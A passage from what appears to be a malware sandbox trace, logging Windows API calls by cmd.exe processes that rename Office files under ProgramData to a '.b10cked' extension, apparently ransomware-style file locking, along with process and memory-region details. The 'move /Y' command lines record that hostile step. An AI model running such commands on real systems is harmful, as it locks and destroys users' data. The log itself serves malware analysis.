(_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0154.268] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0154.268] _wcsicmp (_String1="MSOINT~2.TRX", _String2=".") returned 63 [0154.268] _wcsicmp 
(_String1="MSOINT~2.TRX", _String2="..") returned 63 [0154.268] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\msoint~2.trx")) returned 0x2020 [0154.268] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4c1f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0154.268] SetErrorMode (uMode=0x0) returned 0x0 [0154.268] SetErrorMode (uMode=0x1) returned 0x0 [0154.268] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~2.TRX", nBufferLength=0x104, lpBuffer=0x30e9fc, lpFilePart=0x30e9e4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~2.TRX", lpFilePart=0x30e9e4*="MSOINT~2.TRX") returned 0x3c [0154.268] SetErrorMode (uMode=0x0) returned 0x1 [0154.268] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0154.269] _wcsicmp (_String1="MSOINT~2.TRX", _String2=".") returned 63 [0154.269] _wcsicmp (_String1="MSOINT~2.TRX", _String2="..") returned 63 [0154.269] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\msoint~2.trx")) returned 0x2020 [0154.269] SetErrorMode (uMode=0x0) returned 0x0 [0154.269] SetErrorMode (uMode=0x1) returned 0x0 [0154.269] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~2.TRX", nBufferLength=0x104, lpBuffer=0x30ee78, lpFilePart=0x30ec10 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~2.TRX", lpFilePart=0x30ec10*="MSOINT~2.TRX") returned 0x3c [0154.269] SetErrorMode (uMode=0x0) returned 0x1 [0154.269] SetErrorMode (uMode=0x0) returned 0x0 [0154.269] SetErrorMode (uMode=0x1) returned 0x0 [0154.269] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x30f080, lpFilePart=0x30ec10 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.REST.trx_dll.b10cked", lpFilePart=0x30ec10*="MSOINTL.REST.trx_dll.b10cked") returned 0x4c [0154.269] SetErrorMode (uMode=0x0) returned 0x1 [0154.269] SetLastError (dwErrCode=0x0) [0154.269] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\msointl.rest.trx_dll.b10cked")) returned 0xffffffff [0154.269] GetLastError () returned 0x2 [0154.269] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x30e58c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30e58c) returned 0x4c2130 [0154.270] FindNextFileW (in: hFindFile=0x4c2130, lpFindFileData=0x30e58c | out: lpFindFileData=0x30e58c) returned 0 [0154.270] GetLastError () returned 0x12 [0154.270] FindClose (in: hFindFile=0x4c2130 | out: hFindFile=0x4c2130) returned 1 [0154.272] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x4c1cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4c1cc0) returned 0x4c2130 [0154.272] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x30e824, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0154.272] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x30e824, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.REST.trx_dll", lpFilePart=0x0) returned 0x44 [0154.272] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\msointl.rest.trx_dll")) returned 0x2020 [0154.272] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\msointl.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\msointl.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0154.273] FindClose (in: hFindFile=0x4c2130 | out: hFindFile=0x4c2130) returned 1 [0154.273] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x30e7d8 | out: _Buffer=" 1") returned 9 [0154.273] _get_osfhandle (_FileHandle=1) returned 0x7 [0154.273] GetFileType (hFile=0x7) returned 0x2 [0154.273] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0154.273] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30e764 | out: lpMode=0x30e764) returned 1 [0154.273] _get_osfhandle (_FileHandle=1) returned 0x7 [0154.273] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x30e798 | out: lpConsoleScreenBufferInfo=0x30e798) returned 1 [0154.274] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0154.274] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x30e7d8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0154.274] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, 
lpNumberOfCharsWritten=0x30e7bc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x30e7bc*=0x1a) returned 1 [0154.274] _get_osfhandle (_FileHandle=1) returned 0x7 [0154.274] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0154.275] _get_osfhandle (_FileHandle=1) returned 0x7 [0154.275] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0154.275] _get_osfhandle (_FileHandle=0) returned 0x3 [0154.275] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0154.275] SetConsoleInputExeNameW () returned 0x1 [0154.275] GetConsoleOutputCP () returned 0x1b5 [0154.275] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0154.275] SetThreadUILanguage (LangId=0x0) returned 0x409 [0154.275] exit (_Code=0) Process: id = "257" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168c0" os_pid = "0x15c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINTL.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 21226 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 21227 start_va = 0x30000 end_va = 0x33fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 21228 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 21229 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 21230 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 21231 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 21232 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 21233 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 21234 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 21235 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 21236 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 21237 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 21238 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = 
"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 21239 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 21240 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 21241 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 21242 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 21243 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 21244 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 21245 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 21246 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 21247 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 21248 
start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 21249 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 21250 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 21251 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 21252 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 21253 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 21254 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 21255 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 21256 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 21257 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 21258 start_va = 0x570000 end_va = 0x116ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21259 start_va = 0x1170000 end_va = 0x12d2fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001170000" filename = "" Thread: id = 320 os_tid = 0x78c [0154.888] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f9ac | out: lpSystemTimeAsFileTime=0x20f9ac*(dwLowDateTime=0x9641eaa0, dwHighDateTime=0x1d440a9)) [0154.888] GetCurrentProcessId () returned 0x15c [0154.888] GetCurrentThreadId () returned 0x78c [0154.888] GetTickCount () returned 0x2f9f7 [0154.888] QueryPerformanceCounter (in: lpPerformanceCount=0x20f9a4 | out: lpPerformanceCount=0x20f9a4*=21167737390) returned 1 [0154.889] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0154.889] __set_app_type (_Type=0x1) [0154.889] __p__fmode () returned 0x76b331f4 [0154.889] __p__commode () returned 0x76b331fc [0154.889] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0154.889] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0154.889] GetCurrentThreadId () returned 0x78c [0154.889] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x78c) returned 0x38 [0154.889] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0154.889] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0154.889] SetThreadUILanguage (LangId=0x0) returned 0x409 [0154.889] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0154.889] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20f93c | out: phkResult=0x20f93c*=0x0) returned 0x2 [0154.890] VirtualQuery (in: lpAddress=0x20f973, lpBuffer=0x20f90c, dwLength=0x1c | out: lpBuffer=0x20f90c*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0154.890] VirtualQuery (in: 
lpAddress=0x110000, lpBuffer=0x20f90c, dwLength=0x1c | out: lpBuffer=0x20f90c*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0154.890] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20f90c, dwLength=0x1c | out: lpBuffer=0x20f90c*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0154.890] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20f90c, dwLength=0x1c | out: lpBuffer=0x20f90c*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0154.890] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20f90c, dwLength=0x1c | out: lpBuffer=0x20f90c*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0154.890] GetConsoleOutputCP () returned 0x1b5 [0154.890] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0154.890] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0154.890] _get_osfhandle (_FileHandle=1) returned 0x7 [0154.890] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0154.890] _get_osfhandle (_FileHandle=1) returned 0x7 [0154.890] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0154.890] _get_osfhandle (_FileHandle=1) returned 0x7 [0154.890] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0154.890] _get_osfhandle (_FileHandle=0) returned 0x3 [0154.890] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0154.891] _get_osfhandle (_FileHandle=0) returned 0x3 [0154.891] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0154.891] GetEnvironmentStringsW () returned 0x370210* [0154.891] 
FreeEnvironmentStringsW (penv=0x370210) returned 1 [0154.891] GetEnvironmentStringsW () returned 0x370210* [0154.891] FreeEnvironmentStringsW (penv=0x370210) returned 1 [0154.891] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e8ac | out: phkResult=0x20e8ac*=0x40) returned 0x0 [0154.891] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e8b4, lpData=0x20e8b8, lpcbData=0x20e8b0*=0x1000 | out: lpType=0x20e8b4*=0x0, lpData=0x20e8b8*=0xa0, lpcbData=0x20e8b0*=0x1000) returned 0x2 [0154.891] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e8b4, lpData=0x20e8b8, lpcbData=0x20e8b0*=0x1000 | out: lpType=0x20e8b4*=0x4, lpData=0x20e8b8*=0x1, lpcbData=0x20e8b0*=0x4) returned 0x0 [0154.891] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e8b4, lpData=0x20e8b8, lpcbData=0x20e8b0*=0x1000 | out: lpType=0x20e8b4*=0x0, lpData=0x20e8b8*=0x1, lpcbData=0x20e8b0*=0x1000) returned 0x2 [0154.891] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e8b4, lpData=0x20e8b8, lpcbData=0x20e8b0*=0x1000 | out: lpType=0x20e8b4*=0x4, lpData=0x20e8b8*=0x0, lpcbData=0x20e8b0*=0x4) returned 0x0 [0154.891] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e8b4, lpData=0x20e8b8, lpcbData=0x20e8b0*=0x1000 | out: lpType=0x20e8b4*=0x4, lpData=0x20e8b8*=0x40, lpcbData=0x20e8b0*=0x4) returned 0x0 [0154.891] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e8b4, lpData=0x20e8b8, lpcbData=0x20e8b0*=0x1000 | out: lpType=0x20e8b4*=0x4, lpData=0x20e8b8*=0x40, lpcbData=0x20e8b0*=0x4) returned 0x0 [0154.891] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e8b4, lpData=0x20e8b8, lpcbData=0x20e8b0*=0x1000 | out: lpType=0x20e8b4*=0x0, 
lpData=0x20e8b8*=0x40, lpcbData=0x20e8b0*=0x1000) returned 0x2 [0154.891] RegCloseKey (hKey=0x40) returned 0x0 [0154.891] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e8ac | out: phkResult=0x20e8ac*=0x40) returned 0x0 [0154.891] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e8b4, lpData=0x20e8b8, lpcbData=0x20e8b0*=0x1000 | out: lpType=0x20e8b4*=0x0, lpData=0x20e8b8*=0x40, lpcbData=0x20e8b0*=0x1000) returned 0x2 [0154.892] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e8b4, lpData=0x20e8b8, lpcbData=0x20e8b0*=0x1000 | out: lpType=0x20e8b4*=0x4, lpData=0x20e8b8*=0x1, lpcbData=0x20e8b0*=0x4) returned 0x0 [0154.892] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e8b4, lpData=0x20e8b8, lpcbData=0x20e8b0*=0x1000 | out: lpType=0x20e8b4*=0x0, lpData=0x20e8b8*=0x1, lpcbData=0x20e8b0*=0x1000) returned 0x2 [0154.892] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e8b4, lpData=0x20e8b8, lpcbData=0x20e8b0*=0x1000 | out: lpType=0x20e8b4*=0x4, lpData=0x20e8b8*=0x0, lpcbData=0x20e8b0*=0x4) returned 0x0 [0154.892] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e8b4, lpData=0x20e8b8, lpcbData=0x20e8b0*=0x1000 | out: lpType=0x20e8b4*=0x4, lpData=0x20e8b8*=0x9, lpcbData=0x20e8b0*=0x4) returned 0x0 [0154.892] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e8b4, lpData=0x20e8b8, lpcbData=0x20e8b0*=0x1000 | out: lpType=0x20e8b4*=0x4, lpData=0x20e8b8*=0x9, lpcbData=0x20e8b0*=0x4) returned 0x0 [0154.892] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e8b4, lpData=0x20e8b8, lpcbData=0x20e8b0*=0x1000 | out: lpType=0x20e8b4*=0x0, lpData=0x20e8b8*=0x9, lpcbData=0x20e8b0*=0x1000) returned 0x2 [0154.892] 
RegCloseKey (hKey=0x40) returned 0x0 [0154.892] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88637d [0154.892] srand (_Seed=0x5b88637d) [0154.892] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINTL.DLL.trx_dll.b10cked\"" [0154.892] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINTL.DLL.trx_dll.b10cked\"" [0154.892] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0154.892] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x371970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0154.892] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0154.892] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0154.892] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0154.892] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0154.892] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0154.893] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0154.893] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0154.893] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0154.893] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0154.893] _wcsicmp (_String1="PROMPT", _String2="RANDOM") 
returned -2 [0154.893] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0154.893] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0154.893] GetEnvironmentStringsW () returned 0x372360* [0154.893] FreeEnvironmentStringsW (penv=0x372360) returned 1 [0154.893] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0154.893] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0154.893] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0154.893] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0154.893] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0154.893] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0154.893] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0154.893] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0154.893] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0154.893] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0154.893] GetCurrentDirectoryW (in: nBufferLength=0x104, 